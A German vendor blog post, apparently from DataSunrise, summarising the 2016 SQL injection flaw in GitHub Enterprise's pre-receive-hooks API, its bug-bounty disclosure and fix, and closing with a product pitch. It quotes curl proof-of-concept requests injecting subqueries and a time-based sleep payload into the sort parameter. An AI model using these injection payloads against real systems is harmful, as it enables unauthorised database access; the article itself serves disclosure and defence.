Haben Sie eine fröhliche kleine Schwachstelle
SQL-Injection-Angriffe gegen Anwendungen nehmen zu, wobei große Unternehmen und globale Konzerne das Hauptziel sind. Wie wir immer wieder gesehen haben, können selbst Software von zuverlässigen Anbietern Schwachstellen aufweisen, die es böswilligen Nutzern ermöglichen, die Sicherheit einer Anwendung zu kompromittieren. Hier ist ein weiteres Beispiel.
Das Ende des Jahres 2016 war geprägt von der Entdeckung einer neuen Schwachstelle in GitHub Enterprise. GitHub.com ist ein webbasiertes Hosting-Service, das Git verwendet – ein Open-Source-Distributed-Version-Control-System. GitHub Enterprise ist die lokale Version von GitHub, die für den Einsatz im lokalen Netzwerk einer Organisation verpackt ist. Die entdeckte Schwachstelle ermöglichte es böswilligen Nutzern, SQL-Befehle in SQL-Anweisungen einzuschleusen, indem sie eine spezifische Anfrage senden.
GitHub Enterprise wird als virtuelle Appliance mit 45-tägigen kostenlosen Testlizenzen geliefert. Es teilt eine Codebasis mit GitHub.com. Der Quellcode wird privat gehalten und während der Installation wird er im transparenten Modus abgerufen. Nachdem der Code de-obfuskiert wurde, fand der Forscher heraus, dass der Code hauptsächlich in Ruby mit Python-, C++-, Bourne-Shell- und Java-Komponenten geschrieben war. Nach dem Zugriff auf den Code brauchte er nur vier Tage, um potenzielle Probleme zu analysieren und eine SQL-Injection-Schwachstelle im GitHub Enterprise PreReceiveHookTarget-Modell zu finden. Der bösartige Payload konnte in den Sortierparameter beim Senden einer Anfrage an die API eingeschleust werden.
$ curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \
'https://192.168.187.145/api/v3/organizations/1/pre-receive-hooks?access_token=????????
&sort=id,(select+1+from+information_schema.tables+limit+1,1)'
$ curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \
'https://192.168.187.145/api/v3/organizations/1/pre-receive-hooks?access_token=????????
&sort=id,(select+1+from+mysql.user+limit+1,1)'
{
"message": "Server Error",
"documentation_url": "https://developer.github.com/enterprise/2.8/v3/orgs/pre_receive_hooks"
}
$ curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \
'https://192.168.187.145/api/v3/organizations/1/pre-receive-hooks?access_token=????????
&sort=id,if(user()="github@localhost",sleep(5),user()) GitHub wurde im Dezember über die Schwachstelle informiert und behebt das Problem in der GitHub Enterprise 2.8.5-Version. Der Forscher, der den Fehler entdeckt hat, erhielt eine Belohnung von $ 5.000. Das Bug-Bounty-Programm von GitHub wurde vor drei Jahren gestartet. In dieser Zeit wurden mehr als 100 Software-Sicherheitsforscher belohnt und über $ 100.000 wurden bezahlt, um ihre Bemühungen zu würdigen.
SQL-Injection ist die gefährlichste und am häufigsten ausgenutzte Anwendungsschwachstelle. Daher ist es entscheidend, die richtigen Werkzeuge zur Verhinderung solcher Angriffe zu haben. DataSunrise überwacht und analysiert SQL-Anfragen ständig, um SQL-Injections in Echtzeit zu verhindern und eine kontinuierliche Datenbanksicherheit zu gewährleisten.
